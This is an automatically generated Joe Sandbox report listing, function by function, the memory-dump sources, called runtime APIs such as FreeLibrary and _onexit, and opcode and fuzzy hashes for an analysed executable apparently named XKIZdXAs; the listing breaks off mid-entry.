                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                          • String ID:
                                                                          • API String ID: 3947729631-0
                                                                          • Opcode ID: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                          • Instruction ID: d15e7e6782559493a9a3084d7b27dd6f8afb6c6604af7d8a74454721e378a234
                                                                          • Opcode Fuzzy Hash: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                          • Instruction Fuzzy Hash: 1141C161E4E6568AFB68BB15D450278E271EF88B40FC64039DA0E472F1FE3DE9439360
                                                                          Function 00007FF7ADC46D04 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 3215553584-0
                                                                          • Opcode ID: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                          • Instruction ID: 7cdb9eb36803a760c93b9d6af1482208053baf8efd59637ecf807351e0b7f333
                                                                          • Opcode Fuzzy Hash: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                          • Instruction Fuzzy Hash: 9821387260D6428BD765AF24E4483B9B6A1EB80B50FD54234DA6D872E9EF3CC802C710
                                                                          Function 00007FF7ADC348E0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 3215553584-0
                                                                          • Opcode ID: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                          • Instruction ID: 7ab2a9eafad88363b869ad977de8ee3224ef7507f13970ace4c819b196b407e7
                                                                          • Opcode Fuzzy Hash: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                          • Instruction Fuzzy Hash: 5F21AD21A1E6828AFA54BF11940017DD2A1FF45B84FD54130EE4C97BA6FFBCE8429761
                                                                          Function 00007FF7ADC85B80 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                          • Instruction ID: ed1fb48384bdb257a71bce9f88564472cc726616771587c526296b500892488b
                                                                          • Opcode Fuzzy Hash: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                          • Instruction Fuzzy Hash: C8112826B2EA4589EB44AF16D0907BCA360EB88F91FD55132DE1E073B5DF7CD4928710
                                                                          Function 00007FF7ADC40414 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                          • Instruction ID: 6d88356a92b86dd8481bda94603b66dbb5ee7b2ca6b40c055d6ddcd931681cba
                                                                          • Opcode Fuzzy Hash: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                          • Instruction Fuzzy Hash: DC1198B291E74699D614BF50D4082ADF762EF84351FD14132D64D066F5EFBCE002DB20
                                                                          Function 00007FF7ADC348EC Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 3215553584-0
                                                                          • Opcode ID: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                          • Instruction ID: 0ff43fd2a1657bfbe869dabb5c4f41ccb9d3a2b7e7c05ac4be54906424774f61
                                                                          • Opcode Fuzzy Hash: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                          • Instruction Fuzzy Hash: 2F017121A0E20749FD1CBA659415378D151DF85764FE61630E92D462F3EDACE4035220
                                                                          Function 00007FF7ADC34970 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 3215553584-0
                                                                          • Opcode ID: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                          • Instruction ID: acebbc9163d3d8d1537500b6f88907ec1319eadc7d58cb751c1e4b8169f52494
                                                                          • Opcode Fuzzy Hash: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                          • Instruction Fuzzy Hash: 1AF0B421A1E3038EE91CB765A44127DE284DF44750FE61130F95E862F7FEACE4438671
                                                                          Function 00007FF7ADC0652C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00007FF7ADC34970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ADC34999
                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF7ADC4C8FE), ref: 00007FF7ADC0656F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 3938577545-0
                                                                          • Opcode ID: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                          • Instruction ID: b55c8bc4162875b1eaa2d0baef95f0301662209d438e744a98fed1079a94d07d
                                                                          • Opcode Fuzzy Hash: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                          • Instruction Fuzzy Hash: C2F05E52A0EA058BFF19EF75D0653386360FB58F0CFD60530DA2E0A299EF6CD4558361
                                                                          Function 00007FF7ADC24C68 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ADC24C5C
                                                                            • Part of subcall function 00007FF7ADC25600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7ADC25609
                                                                            • Part of subcall function 00007FF7ADC25600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF7ADC2561A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                                          • String ID:
                                                                          • API String ID: 1680350287-0
                                                                          • Opcode ID: 7d825c203f33d876e0f9772e5deb8c91ddec8345425eda6b56f6c61ae83936be
                                                                          • Instruction ID: 1df6da365ec86ef8c3a785907cf6a2a8f951353526ed75c30df9983fc4921b8e
                                                                          • Opcode Fuzzy Hash: 7d825c203f33d876e0f9772e5deb8c91ddec8345425eda6b56f6c61ae83936be
                                                                          • Instruction Fuzzy Hash: 71E0B640E1F1074EFD68B7A955450BA91408F68770EDA1B30D93D492E6BD5CA4534130
                                                                          Function 00007FF7ADC7B334 Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                          • Instruction ID: dcbe2ff7007b2d18d7ffc79181958655599d60f1b87db15f43089702834a1c41
                                                                          • Opcode Fuzzy Hash: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                          • Instruction Fuzzy Hash: 15E03922A18A9183D720DF06F44435AE370FB89BD8F944525EF8C47B2ACF7DC5528B80
                                                                          Function 00007FF7ADC03EB4 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: LongNamePath
                                                                          • String ID:
                                                                          • API String ID: 82841172-0
                                                                          • Opcode ID: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                          • Instruction ID: ee01c915da2869d40f63cbac7f229c5f844689519ad480f154270708ccdba3b6
                                                                          • Opcode Fuzzy Hash: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                          • Instruction Fuzzy Hash: E1E0D822B0C78185DB21AB25E144399A366FF8C7C4F854031FE8C4376ADD6CC6858B10
                                                                          Function 00007FF7ADC05D88 Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_
                                                                          • String ID:
                                                                          • API String ID: 1144537725-0
                                                                          • Opcode ID: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                          • Instruction ID: 8f1c6ae32c28b2efe959d0e610fab18511b26c713e9e8d06ade077bdf11691c6
                                                                          • Opcode Fuzzy Hash: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                          • Instruction Fuzzy Hash: D9F05E62A1E7818BE761AB54E4043A5B6A4F788708FC50035D18D063A5EE3CD30ACB60
                                                                          Function 00007FF7ADC01080 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Open_onexit
                                                                          • String ID:
                                                                          • API String ID: 3030063568-0
                                                                          • Opcode ID: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                          • Instruction ID: 30330df5bfa3c05766ffdf51609b38a02f93418436ebee737bcbea5dd28d56f3
                                                                          • Opcode Fuzzy Hash: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                          • Instruction Fuzzy Hash: A3E08C61F1F64B89EA04B76998891B483A0EFA5706FC25536C00C822B2FE5CD29B8320
                                                                          Function 00007FF7ADC010E8 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentVersionWow64_onexit
                                                                          • String ID:
                                                                          • API String ID: 2932345936-0
                                                                          • Opcode ID: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                          • Instruction ID: 8a9c17452205dd014b7f02cab87598b0c79b7fe669c3843bdcb100e51c8ce412
                                                                          • Opcode Fuzzy Hash: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                          • Instruction Fuzzy Hash: 28C01210E6F04BC5E60873B9488A0B481A0DFF5314FD2063AD10D812A2FD1C51EB0631
                                                                          Function 00007FF7ADC01064 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _onexit
                                                                          • String ID:
                                                                          • API String ID: 572287377-0
                                                                          • Opcode ID: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                          • Instruction ID: b9a4d77760961b6bdba03ecd7633122637014a9270332798a28b82fc416ede36
                                                                          • Opcode Fuzzy Hash: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                          • Instruction Fuzzy Hash: 63C01211E6F05BC9E51873B94C8A07881909FF5301FD10235D10D802E2FD1C51E74631
                                                                          Function 00007FF7ADC01048 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _onexit
                                                                          • String ID:
                                                                          • API String ID: 572287377-0
                                                                          • Opcode ID: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                          • Instruction ID: 4e54b315c99e613af8fe9e6b308fd4d7ff2085774460cdb5654a13810f847011
                                                                          • Opcode Fuzzy Hash: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                          • Instruction Fuzzy Hash: 3CC01210E5F05B85E50873BD488A07481909FF9311FD10635D00D802E2FD0C51EB0B22
                                                                          Function 00007FF7ADC87E48 Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                                          • Instruction ID: 80566547ecadac1d6a654ff298f929d76028700b803279427ac689baf3623f0a
                                                                          • Opcode Fuzzy Hash: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                                          • Instruction Fuzzy Hash: 54715D32B0AA4189EB14FF65D4913EDA360EB44B84FC54131DE0E577A6EF38D546C360
                                                                          Function 00007FF7ADC3C51C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
